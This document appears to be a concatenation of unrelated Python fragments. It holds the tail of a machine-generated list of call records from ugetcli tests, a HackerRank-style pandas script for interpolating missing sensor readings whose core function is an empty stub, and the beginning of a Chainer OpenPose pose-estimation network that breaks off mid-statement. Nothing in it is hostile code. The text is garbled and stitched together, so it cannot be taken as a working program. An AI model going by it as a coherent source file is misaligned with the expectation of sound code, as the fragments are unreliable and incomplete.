False, 'import os\n'), ((1964, 2017), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (1981, 2017), False, 'from ugetcli.utils import create_empty_file\n'), ((2030, 2083), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (2047, 2083), False, 'from ugetcli.utils import create_empty_file\n'), ((3002, 3028), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (3019, 3028), False, 'from ugetcli.utils import create_empty_file\n'), ((3755, 3793), 'os.makedirs', 'os.makedirs', (['"""custom/bin/Output/Debug"""'], {}), "('custom/bin/Output/Debug')\n", (3766, 3793), False, 'import os\n'), ((3806, 3866), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""custom/bin/Output/Debug/TestProject.dll"""'], {}), "('custom/bin/Output/Debug/TestProject.dll')\n", (3823, 3866), False, 'from ugetcli.utils import create_empty_file\n'), ((3879, 3939), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""custom/bin/Output/Debug/TestProject.pdb"""'], {}), "('custom/bin/Output/Debug/TestProject.pdb')\n", (3896, 3939), False, 'from ugetcli.utils import create_empty_file\n'), ((4927, 4953), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (4944, 4953), False, 'from ugetcli.utils import create_empty_file\n'), ((5680, 5718), 'os.makedirs', 'os.makedirs', (['"""custom/bin/Output/Debug"""'], {}), "('custom/bin/Output/Debug')\n", (5691, 5718), False, 'import os\n'), ((5731, 5791), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""custom/bin/Output/Debug/TestProject.dll"""'], {}), "('custom/bin/Output/Debug/TestProject.dll')\n", (5748, 5791), False, 'from ugetcli.utils import create_empty_file\n'), ((5804, 5864), 'ugetcli.utils.create_empty_file', 'create_empty_file', 
(['"""custom/bin/Output/Debug/TestProject.pdb"""'], {}), "('custom/bin/Output/Debug/TestProject.pdb')\n", (5821, 5864), False, 'from ugetcli.utils import create_empty_file\n'), ((6860, 6886), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (6877, 6886), False, 'from ugetcli.utils import create_empty_file\n'), ((7608, 7639), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (7619, 7639), False, 'import os\n'), ((7652, 7705), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (7669, 7705), False, 'from ugetcli.utils import create_empty_file\n'), ((7718, 7771), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (7735, 7771), False, 'from ugetcli.utils import create_empty_file\n'), ((8694, 8720), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (8711, 8720), False, 'from ugetcli.utils import create_empty_file\n'), ((9442, 9473), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (9453, 9473), False, 'import os\n'), ((9486, 9539), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (9503, 9539), False, 'from ugetcli.utils import create_empty_file\n'), ((9552, 9605), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (9569, 9605), False, 'from ugetcli.utils import create_empty_file\n'), ((10575, 10601), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (10592, 10601), False, 'from ugetcli.utils import create_empty_file\n'), ((11323, 11354), 'os.makedirs', 'os.makedirs', 
(['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (11334, 11354), False, 'import os\n'), ((11367, 11420), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (11384, 11420), False, 'from ugetcli.utils import create_empty_file\n'), ((11433, 11486), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (11450, 11486), False, 'from ugetcli.utils import create_empty_file\n'), ((12443, 12469), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (12460, 12469), False, 'from ugetcli.utils import create_empty_file\n'), ((13191, 13222), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (13202, 13222), False, 'import os\n'), ((13235, 13288), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (13252, 13288), False, 'from ugetcli.utils import create_empty_file\n'), ((13301, 13354), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (13318, 13354), False, 'from ugetcli.utils import create_empty_file\n'), ((14286, 14312), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (14303, 14312), False, 'from ugetcli.utils import create_empty_file\n'), ((15034, 15065), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (15045, 15065), False, 'import os\n'), ((15078, 15131), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (15095, 15131), False, 'from ugetcli.utils import create_empty_file\n'), ((15144, 15197), 'ugetcli.utils.create_empty_file', 
'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (15161, 15197), False, 'from ugetcli.utils import create_empty_file\n'), ((15210, 15232), 'os.makedirs', 'os.makedirs', (['"""Output/"""'], {}), "('Output/')\n", (15221, 15232), False, 'import os\n'), ((15245, 15311), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""Output/TestProject_0.1.0_Release.unitypackage"""'], {}), "('Output/TestProject_0.1.0_Release.unitypackage')\n", (15262, 15311), False, 'from ugetcli.utils import create_empty_file\n'), ((15345, 15411), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""Output/TestProject_0.1.1_Release.unitypackage"""'], {}), "('Output/TestProject_0.1.1_Release.unitypackage')\n", (15362, 15411), False, 'from ugetcli.utils import create_empty_file\n'), ((15445, 15509), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""Output/TestProject_0.1.0_Debug.unitypackage"""'], {}), "('Output/TestProject_0.1.0_Debug.unitypackage')\n", (15462, 15509), False, 'from ugetcli.utils import create_empty_file\n'), ((15825, 15886), 'os.path.isfile', 'os.path.isfile', (['"""Output/TestProject_0.1.0_Debug.unitypackage"""'], {}), "('Output/TestProject_0.1.0_Debug.unitypackage')\n", (15839, 15886), False, 'import os\n'), ((16715, 16741), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (16732, 16741), False, 'from ugetcli.utils import create_empty_file\n'), ((17463, 17494), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (17474, 17494), False, 'import os\n'), ((17507, 17560), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (17524, 17560), False, 'from ugetcli.utils import create_empty_file\n'), ((17573, 17626), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), 
"('bin/Output/Debug/TestProject.pdb')\n", (17590, 17626), False, 'from ugetcli.utils import create_empty_file\n'), ((18570, 18596), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (18587, 18596), False, 'from ugetcli.utils import create_empty_file\n'), ((19558, 19589), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (19569, 19589), False, 'import os\n'), ((19602, 19655), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (19619, 19655), False, 'from ugetcli.utils import create_empty_file\n'), ((19668, 19721), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (19685, 19721), False, 'from ugetcli.utils import create_empty_file\n'), ((19734, 19762), 'os.makedirs', 'os.makedirs', (['"""CustomOutput/"""'], {}), "('CustomOutput/')\n", (19745, 19762), False, 'import os\n'), ((19775, 19847), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""CustomOutput/TestProject_0.1.0_Release.unitypackage"""'], {}), "('CustomOutput/TestProject_0.1.0_Release.unitypackage')\n", (19792, 19847), False, 'from ugetcli.utils import create_empty_file\n'), ((926, 977), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (942, 977), False, 'import os\n'), ((1008, 1073), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (1024, 1073), False, 'import os\n'), ((2831, 2882), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (2847, 2882), False, 'import os\n'), ((2913, 2978), 'os.path.normpath', 'os.path.normpath', 
(['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (2929, 2978), False, 'import os\n'), ((4756, 4807), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (4772, 4807), False, 'import os\n'), ((4838, 4903), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (4854, 4903), False, 'import os\n'), ((6692, 6743), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (6708, 6743), False, 'import os\n'), ((6774, 6836), 'os.path.normpath', 'os.path.normpath', (['"""out/TestProject_1.0.0_Release.unitypackage"""'], {}), "('out/TestProject_1.0.0_Release.unitypackage')\n", (6790, 6836), False, 'import os\n'), ((8525, 8576), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (8541, 8576), False, 'import os\n'), ((8607, 8670), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Debug.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Debug.unitypackage')\n", (8623, 8670), False, 'import os\n'), ((10404, 10455), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (10420, 10455), False, 'import os\n'), ((10486, 10551), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (10502, 10551), False, 'import os\n'), ((12265, 12323), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/MyUnityPackageRoot"""'], {}), "('UnityProject/Assets/MyUnityPackageRoot')\n", (12281, 12323), False, 'import os\n'), ((12354, 12419), 'os.path.normpath', 'os.path.normpath', 
(['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (12370, 12419), False, 'import os\n'), ((14115, 14166), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (14131, 14166), False, 'import os\n'), ((14197, 14262), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (14213, 14262), False, 'import os\n'), ((15655, 15718), 'os.path.isfile', 'os.path.isfile', (['"""Output/TestProject_0.1.0_Release.unitypackage"""'], {}), "('Output/TestProject_0.1.0_Release.unitypackage')\n", (15669, 15718), False, 'import os\n'), ((15742, 15805), 'os.path.isfile', 'os.path.isfile', (['"""Output/TestProject_0.1.1_Release.unitypackage"""'], {}), "('Output/TestProject_0.1.1_Release.unitypackage')\n", (15756, 15805), False, 'import os\n'), ((16544, 16595), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (16560, 16595), False, 'import os\n'), ((16626, 16691), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (16642, 16691), False, 'import os\n'), ((18386, 18446), 'os.path.normpath', 'os.path.normpath', (['"""CustomUnityProject/Assets/MyUnityPackage"""'], {}), "('CustomUnityProject/Assets/MyUnityPackage')\n", (18402, 18446), False, 'import os\n'), ((18477, 18546), 'os.path.normpath', 'os.path.normpath', (['"""CustomOutput/TestProject_1.0.0_Debug.unitypackage"""'], {}), "('CustomOutput/TestProject_1.0.0_Debug.unitypackage')\n", (18493, 18546), False, 'import os\n'), ((20016, 20079), 'os.path.isfile', 'os.path.isfile', (['"""Output/TestProject_0.1.0_Release.unitypackage"""'], {}), "('Output/TestProject_0.1.0_Release.unitypackage')\n", (20030, 20079), False, 
'import os\n'), ((19958, 19981), 'json.dumps', 'json.dumps', (['config_data'], {}), '(config_data)\n', (19968, 19981), False, 'import json\n')] |
#! /usr/bin/env python
import re
import pandas as pd
from numpy import interp
import os
from pathlib import Path
# Resolve the exercise's working directory under the current user's home.
home = os.environ['HOME']
home_dir = Path(home)
work_dir = home_dir / 'Programming/Python/python-exercises/hackerrank'
# Example of a line with a missing measurement: 12/14/2012 16:00:00 Missing_19
# NOTE(review): the pattern is hard-coded to year 2012 and the 16:00:00
# timestamp — confirm the data file never contains other years/times.
pattern = re.compile(r'(\d{1,2}/\d{1,2}/2012)\s+(16:00:00)\s+(Missing_\d{1,2})')
# Dates (as strings) whose reading is marked as Missing_<k>.
missing_list = []
with open(work_dir / 'data/readings.txt', 'r') as f:
    lines = f.readlines()
    for index, line in enumerate(lines):
        # print(f'line: {line}')
        missing_item = pattern.findall(line)
        if missing_item:
            # print(f'missing_item: {missing_item}')
            # Keep only the date portion (regex group 1) of the matching line.
            date = pattern.sub(r'\1', line)
            # print(f'date: {date}')
            missing_list.append(date.rstrip())
# Load the same file as a whitespace-separated table: date, time, value.
reading_df = pd.read_csv(work_dir / 'data/readings.txt', sep=r'\s+',
                         names=['date', 'time', 'measurements'])
# Merge the separate date and time columns into one datetime column.
reading_df['date_time'] = reading_df[['date', 'time']].agg(' '.join, axis=1)
reading_df.drop(['date', 'time'], axis=1, inplace=True)
reading_df['date_time'] = pd.to_datetime(reading_df['date_time'], format=r'%m/%d/%Y %H:%M:%S')
# reading_df.set_index('date_time', inplace=True)
# Reorder columns so the datetime comes first, then show a quick summary.
reading_df = reading_df[['date_time', 'measurements']]
print(reading_df.head())
print(reading_df.info())
# new_interp = interp(missing_list)
# print(f'missing_list: {missing_list}')
def calcMissing(readings):
    """Print an estimate for every 'Missing_<k>' measurement.

    Each reading is a whitespace-separated line '<date> <time> <value>'
    where <value> is either a numeric measurement or a 'Missing_<k>'
    placeholder.  Missing values are estimated by linear interpolation
    over the line index (readings are assumed equally spaced in time)
    and printed one per line, in input order.

    Args:
        readings (list[str]): raw reading lines, in chronological order.

    Returns:
        None: results are written to stdout (HackerRank contract).
    """
    known_x = []    # indices of lines with a numeric measurement
    known_y = []    # the corresponding measurement values
    missing_x = []  # indices of lines whose value is missing
    for idx, line in enumerate(readings):
        value = line.strip().split()[-1]
        if value.startswith('Missing'):
            missing_x.append(idx)
        else:
            known_x.append(idx)
            known_y.append(float(value))
    # numpy.interp clamps to the nearest known value outside the known
    # range, which also handles missing entries at either end of the series.
    for estimate in interp(missing_x, known_x, known_y):
        print(estimate)
# if __name__ == '__main__':
# readings_count = int(input().strip())
# readings = []
# for _ in range(readings_count):
# readings_item = input()
# readings.append(readings_item)
# calcMissing(readings)
| [
"pandas.to_datetime",
"re.compile",
"pandas.read_csv",
"pathlib.Path"
] | [((152, 162), 'pathlib.Path', 'Path', (['home'], {}), '(home)\n', (156, 162), False, 'from pathlib import Path\n'), ((278, 352), 're.compile', 're.compile', (['"""(\\\\d{1,2}/\\\\d{1,2}/2012)\\\\s+(16:00:00)\\\\s+(Missing_\\\\d{1,2})"""'], {}), "('(\\\\d{1,2}/\\\\d{1,2}/2012)\\\\s+(16:00:00)\\\\s+(Missing_\\\\d{1,2})')\n", (288, 352), False, 'import re\n'), ((787, 886), 'pandas.read_csv', 'pd.read_csv', (["(work_dir / 'data/readings.txt')"], {'sep': '"""\\\\s+"""', 'names': "['date', 'time', 'measurements']"}), "(work_dir / 'data/readings.txt', sep='\\\\s+', names=['date',\n 'time', 'measurements'])\n", (798, 886), True, 'import pandas as pd\n'), ((1068, 1135), 'pandas.to_datetime', 'pd.to_datetime', (["reading_df['date_time']"], {'format': '"""%m/%d/%Y %H:%M:%S"""'}), "(reading_df['date_time'], format='%m/%d/%Y %H:%M:%S')\n", (1082, 1135), True, 'import pandas as pd\n')] |
from __future__ import print_function
import os
import itertools, pkg_resources, sys
from distutils.version import LooseVersion
# chainer >= 7.0.0 dropped Python 2 support; refuse to run under py2 and
# point the user at the last py2-compatible release instead.
if LooseVersion(pkg_resources.get_distribution("chainer").version) >= LooseVersion('7.0.0') and \
   sys.version_info.major == 2:
    print('''Please install chainer <= 7.0.0:
    sudo pip install chainer==6.7.0
    c.f https://github.com/jsk-ros-pkg/jsk_recognition/pull/2485
''', file=sys.stderr)
    sys.exit(1)
# Scan every distribution visible on sys.path for a cupy-cuda* package and
# abort with install advice if none is found (presumably CuPy is required
# for GPU execution further down this file — TODO confirm).
if [p for p in list(itertools.chain(*[pkg_resources.find_distributions(_) for _ in sys.path])) if "cupy-" in p.project_name ] == []:
    print('''Please install CuPy
    sudo pip install cupy-cuda[your cuda version]
i.e.
    sudo pip install cupy-cuda91
''', file=sys.stderr)
    sys.exit(1)
import chainer
import chainer.functions as F
import chainer.links as L
# Remote location of the released OpenPose pose-model weights.
base_url = 'http://posefs1.perception.cs.cmu.edu/OpenPose/models/pose/'
# Maps the pretrained-model keyword to its .chainermodel file; 'auto'
# falls back to the COCO model.
models = {
    'auto': 'coco/pose_iter_440000.chainermodel',
    'coco': 'coco/pose_iter_440000.chainermodel',
    'mpi': 'mpi/pose_iter_160000.chainermodel',
}
class PoseNet(chainer.Chain):
def __init__(self, pretrained_model='auto'):
super(PoseNet, self).__init__()
with self.init_scope():
self.conv1_1 = L.Convolution2D(
in_channels=3, out_channels=64, ksize=3, stride=1, pad=1)
self.conv1_2 = L.Convolution2D(
in_channels=64, out_channels=64, ksize=3, stride=1, pad=1)
self.conv2_1 = L.Convolution2D(
in_channels=64, out_channels=128, ksize=3, stride=1, pad=1)
self.conv2_2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv3_1 = L.Convolution2D(
in_channels=128, out_channels=256, ksize=3, stride=1, pad=1)
self.conv3_2 = L.Convolution2D(
in_channels=256, out_channels=256, ksize=3, stride=1, pad=1)
self.conv3_3 = L.Convolution2D(
in_channels=256, out_channels=256, ksize=3, stride=1, pad=1)
self.conv3_4 = L.Convolution2D(
in_channels=256, out_channels=256, ksize=3, stride=1, pad=1)
self.conv4_1 = L.Convolution2D(
in_channels=256, out_channels=512, ksize=3, stride=1, pad=1)
self.conv4_2 = L.Convolution2D(
in_channels=512, out_channels=512, ksize=3, stride=1, pad=1)
self.conv4_3_CPM = L.Convolution2D(
in_channels=512, out_channels=256, ksize=3, stride=1, pad=1)
self.conv4_4_CPM = L.Convolution2D(
in_channels=256, out_channels=128, ksize=3, stride=1, pad=1)
# stage1
self.conv5_1_CPM_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv5_2_CPM_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv5_3_CPM_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv5_4_CPM_L1 = L.Convolution2D(
in_channels=128, out_channels=512, ksize=1, stride=1, pad=0)
self.conv5_5_CPM_L1 = L.Convolution2D(
in_channels=512, out_channels=38, ksize=1, stride=1, pad=0)
self.conv5_1_CPM_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv5_2_CPM_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv5_3_CPM_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv5_4_CPM_L2 = L.Convolution2D(
in_channels=128, out_channels=512, ksize=1, stride=1, pad=0)
self.conv5_5_CPM_L2 = L.Convolution2D(
in_channels=512, out_channels=19, ksize=1, stride=1, pad=0)
# stage2
self.Mconv1_stage2_L1 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage2_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage2_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage2_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage2_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage2_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage2_L1 = L.Convolution2D(
in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)
self.Mconv1_stage2_L2 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage2_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage2_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage2_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage2_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage2_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage2_L2 = L.Convolution2D(
in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)
# stage3
self.Mconv1_stage3_L1 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage3_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage3_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage3_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage3_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage3_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage3_L1 = L.Convolution2D(
in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)
self.Mconv1_stage3_L2 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage3_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage3_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage3_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage3_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage3_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage3_L2 = L.Convolution2D(
in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)
# stage4
self.Mconv1_stage4_L1 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage4_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage4_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage4_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage4_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage4_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage4_L1 = L.Convolution2D(
in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)
self.Mconv1_stage4_L2 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage4_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage4_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage4_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage4_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage4_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage4_L2 = L.Convolution2D(
in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)
# stage5
self.Mconv1_stage5_L1 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage5_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage5_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage5_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage5_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage5_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage5_L1 = L.Convolution2D(
in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)
self.Mconv1_stage5_L2 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage5_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage5_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage5_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage5_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage5_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage5_L2 = L.Convolution2D(
in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)
# stage6
self.Mconv1_stage6_L1 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage6_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage6_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage6_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage6_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage6_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage6_L1 = L.Convolution2D(
in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)
self.Mconv1_stage6_L2 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage6_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage6_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage6_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage6_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage6_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage6_L2 = L.Convolution2D(
in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)
if pretrained_model in models.keys():
